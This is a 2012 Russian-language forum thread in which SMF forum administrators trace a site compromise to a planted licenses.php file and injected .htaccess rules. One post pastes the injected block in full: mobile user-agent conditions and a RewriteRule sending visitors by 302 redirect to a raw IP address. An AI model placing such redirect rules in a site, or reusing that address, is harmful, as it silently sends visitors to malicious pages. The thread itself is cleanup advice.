Странный троян на форуме

Мэл · 09 мая 2012, 13:51:22

Всем привет.
На форуме бесчинствует троян.
Через cPanel я проверил полную проверку home директории, уничтожил всё, что можно, в .ftpaccess выставил только свой IP, но в SMF проблема по-прежнему присутствует. При попытке перехода на меню форума идёт редирект куда-то на левый сайт, в результате оказываемся на странице поиска Google. Все .php файлы просмотрел, ничего подозрительного не нашёл (но и упустить мог, с другой стороны). Установлен мод Forum Firewall.
Не подскажите, где смотреть и что делать?
Или только полный бэкап всё решит?
Спасибо.

UPD:
В коренном .htaccess были редиректы - удалил. Все остальные чистые. Проблема не исчезла...

Mr. Anviss · 09 мая 2012, 16:12:06

AcidMan Качественно вы почистили форум.
Connection Problems
Sorry, SMF was unable to connect to the database. This may be caused by the server being busy. Please try again later.

Xansen · 09 мая 2012, 20:30:26

доступ к форуму скинь в личку, посмотрю "горячие уязвимые файлы"...
P.S: проверяй также файлы в папке SCRIPTS твоего активного шаблона форума, особенно файл script.js

Мэл · 09 мая 2012, 21:45:02

Цитата: Mr. Anviss от 09 мая 2012, 16:12:06
AcidMan Качественно вы почистили форум.
Connection Problems
Sorry, SMF was unable to connect to the database. This may be caused by the server being busy. Please try again later.

Вижу.
После чистки этого не было на протяжении пары часов.

Мэл · 09 мая 2012, 22:28:42

Цитата: Xansen от 09 мая 2012, 20:30:26
доступ к форуму скинь в личку, посмотрю "горячие уязвимые файлы"...
P.S: проверяй также файлы в папке SCRIPTS твоего активного шаблона форума, особенно файл script.js

Какой именно доступ?
В папке scripts лежит только script.js, без понятия как его проверять.

Xansen · 10 мая 2012, 04:33:58

Цитата: AcidMan от 09 мая 2012, 22:28:42В папке scripts лежит только script.js, без понятия как его проверять.

ручками, открываешь файл и ищешь подозрительный код. Если интересно пиши в аську завтра: постараюсь помочь.

remingtone · 10 мая 2012, 07:35:36

закрой возможность загружать аватары и файлы извне, и проверь папку аватаров антивирусом по всей строгости.

Мэл · 10 мая 2012, 13:43:55

Цитата: Xansen от 10 мая 2012, 04:33:58
ручками, открываешь файл и ищешь подозрительный код. Если интересно пиши в аську завтра: постараюсь помочь.

Ок, спасибо.

Цитата: okk от 10 мая 2012, 07:35:36
закрой возможность загружать аватары и файлы извне, и проверь папку аватаров антивирусом по всей строгости.

Это я в первую очередь сделал

Мэл · 10 мая 2012, 15:45:39

Сделан откат на 7 дней, вроде всё заработало.
Был обнаружен троян в файле licenses.php (которого там вообще быть не должно).
Вроде работает.
Что посоветуете для усиления защиты?

GeorG · 10 мая 2012, 16:23:39

Проверить свой компьютер с обновленной базой антивируса, после поменяйте пароли на фтп и панель управления сервером (именно в этой последовательности). Если есть у кого-то доступ к фтп кроме вас, скажите им чтобы они тоже проверили себя на вирусы. Ну или не давайте доступ "кому-то" ещё.

Цитата: AcidMan от 10 мая 2012, 15:45:39Что посоветуете для усиления защиты?

Ну ещё наверно , не лазить по "левым" сайтам.

Мэл · 10 мая 2012, 16:25:13

Цитата: GeorG от 10 мая 2012, 16:23:39
Проверить свой компьютер с обновленной базой антивируса, после поменяйте пароли на фтп и панель управления сервером (именно в этой последовательности). Если есть у кого-то доступ к фтп кроме вас, скажите им чтобы они тоже проверили себя на вирусы. Ну или не давайте доступ "кому-то" ещё.
Ну еще наверно ещё, не лазить по "левым" сайтам.

Это всё сделано. Никаких левых сайтов тем более.
И в .ftpaccess стоит только мой IP.

Xansen · 11 мая 2012, 09:53:00

Цитата: AcidMan от 10 мая 2012, 16:25:13И в .ftpaccess стоит только мой IP.

значит сломали через криво настроенные права на запись или дырку в каком нибудь моде или через соседа (если они есть)

Мэл · 11 мая 2012, 10:22:24

Цитата: Xansen от 11 мая 2012, 09:53:00
значит сломали через криво настроенные права на запись или дырку в каком нибудь моде или через соседа (если они есть)

Фашизм с одним моим IP я ввёл после

vniif · 11 мая 2012, 14:24:47

Второй день мучаюсь с аналогичной проблемой-
при заходе на сайт через мобильные устройства и Ipad, выходит сайт с переадресацией и спредложением поменять броузер...
Найти до сих пор не могу:((

Мэл · 11 мая 2012, 14:26:05

Цитата: vniif от 11 мая 2012, 14:24:47
Второй день мучаюсь с аналогичной проблемой-
при заходе на сайт через мобильные устройства и Ipad, выходит сайт с переадресацией и спредложением поменять броузер...
Найти до сих пор не могу:((

Откат сделай как я.

vniif · 11 мая 2012, 14:33:10

да не особо хочется, так как с компа все ок и форум проработал пару дней в рабочем режиме:((
Обращался на хостинг, что бы они прочесали , но ничего не нашли..((

Мэл · 11 мая 2012, 14:53:26

Цитата: vniif от 11 мая 2012, 14:33:10
да не особо хочется, так как с компа все ок и форум проработал пару дней в рабочем режиме:((
Обращался на хостинг, что бы они прочесали , но ничего не нашли..((

У тебя в cPanel от хоста есть скан на вирусы? Мне мой помог, хотя бы отчасти.
И ещё обрати внимание на наличие в директории форума вирусного файла licenses.php.

vniif · 11 мая 2012, 15:00:19

Еще вчера стал искать его, не нашел...
В самой панели нет, там идет проверка с переодичностью в 5 дней..
Вообщем засада какая то..

vniif · 11 мая 2012, 15:51:04

что за файл .vimrc

есть ли ему место в smf?

Xansen · 11 мая 2012, 15:57:07

у тебя скорее всего в файле .htaccess дело. Посмотри его содержимое

vniif · 11 мая 2012, 16:06:36

^))))
FFFFFFFFFFFFFFАААААААА))
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://91.224.161.175/go/1/ [L,R=302]

И что с это строкой сделать?? (с последней я имею ввиду) удалить и все дела??

Xansen · 11 мая 2012, 17:14:06

Вот тебе и ответ на твой вопрос! Удаляй все 3

vniif · 12 мая 2012, 08:17:24

Удалил последнею, всю заработало..Больше ничего не нашел ..
Есть ли смысл редактировать .htaccess :
ErrorDocument 404 /index.php
###AB.PROTECTION###
RewriteEngine on
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|blackberry|j2me|smartphone|series|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

Xansen · 12 мая 2012, 10:03:14

Цитата: vniif от 12 мая 2012, 08:17:24
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|blackberry|j2me|smartphone|series|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

вот это всё кусок редиректа на вирус

remingtone · 14 мая 2012, 01:00:51

интересно другое: как его изменили?

GeorG · 14 мая 2012, 02:30:00

Как? Сломали вас, и поставили мобильный редирект

remingtone · 14 мая 2012, 04:21:42

это вопрос к тому, что надо устранить возможность повторного взлома

vniif · 14 мая 2012, 08:19:22

Согласен...Предохраняться, предохраняться и еще раз)))
Я подцепил эту штуку, один раз воспользовавшись компом друга в Питере..

)
Как я понял, смысла переходить на smf 2.0 нет?

Xansen · 14 мая 2012, 11:50:11

Смотря что для тебя смысл... Я бы на твоем месте хотя бы до 1.1.16 обновился:)

vniif · 14 мая 2012, 11:55:42

да это давно сделано...........в день выхода 1,1,16
в смысле прорех в безопасности

remingtone · 14 мая 2012, 12:18:52

я бы перешел на 2.0.2. хотя двойка и не панацея, но она надежнее

Странный троян на форуме

remingtone

remingtone

remingtone

remingtone